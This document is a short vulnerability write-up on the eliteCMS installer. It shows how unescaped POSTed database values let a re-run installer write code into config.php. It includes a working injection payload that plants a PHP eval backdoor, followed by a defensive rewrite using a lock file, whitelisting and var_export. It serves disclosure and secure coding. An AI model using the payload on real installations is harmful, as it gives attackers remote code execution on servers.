eliteCMS's installer is not locked once installation finishes, so an attacker can visit the installer URL and run the installation again.

Another vulnerability is that the installer can write a one-line PHP backdoor directly into admin/includes/config.php.

Let's look at the code:
// ...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    // ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated straight into the generated PHP, unescaped
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= " die(\"Database connection failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= " die(\"Database select failed\" .mysql_error());\n";
    $write .= " \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    // ...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation. If the POSTed database name is:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
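As an added example (not eliteCMS code), the same config-writing step rewritten defensively: the installer refuses to run once a lock file exists, host/database/user names are whitelisted, and every value is emitted through var_export() so it stays a PHP string literal. The function names and lock-file handling are assumptions.

```php
<?php
// Added example, not eliteCMS code. Helper names and the lock-file path are assumptions.

// Refuse to run the installer once a lock file exists, so step=4 cannot be replayed.
function install_is_locked(string $lockFile): bool {
    return file_exists($lockFile);
}

// Allow only a conservative character set for host, database and user names;
// anything else (quotes, "?>", "<?php", whitespace) is rejected, not written.
function valid_identifier(string $value): bool {
    return preg_match('/^[A-Za-z0-9_.\-]{1,64}$/', $value) === 1;
}

// Build config.php. var_export() emits a single-quoted PHP literal with ' and \
// escaped, so a value can never close the literal or the enclosing PHP block.
function build_config(array $db): string {
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $key) {
        if (!valid_identifier((string) ($db[$key] ?? ''))) {
            throw new InvalidArgumentException("invalid $key");
        }
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= sprintf("define('%s', %s);\n", $key, var_export((string) ($db[$key] ?? ''), true));
    }
    return $out;
}

// Write config.php only when unlocked, then set the lock; keep the file unreadable to others.
function write_config(string $file, string $lockFile, array $db): void {
    if (install_is_locked($lockFile)) {
        throw new RuntimeException('installer already ran; refusing to overwrite config');
    }
    $contents = build_config($db);
    if (file_put_contents($file, $contents, LOCK_EX) === false) {
        throw new RuntimeException('could not write config');
    }
    chmod($file, 0640);
    touch($lockFile);
}

// Constructed demo: a hostile DB name is rejected; a hostile password stays an inert literal.
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => '?><?php', 'DB_USER' => 'cms', 'DB_PASS' => 'x']);
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), "\n";
}
echo build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => 'cms', 'DB_USER' => 'cms', 'DB_PASS' => "?><?php 'x"]);
```

The password is deliberately not pattern-restricted; the second call shows that var_export() alone keeps a value containing `?>` and a quote inside the string literal.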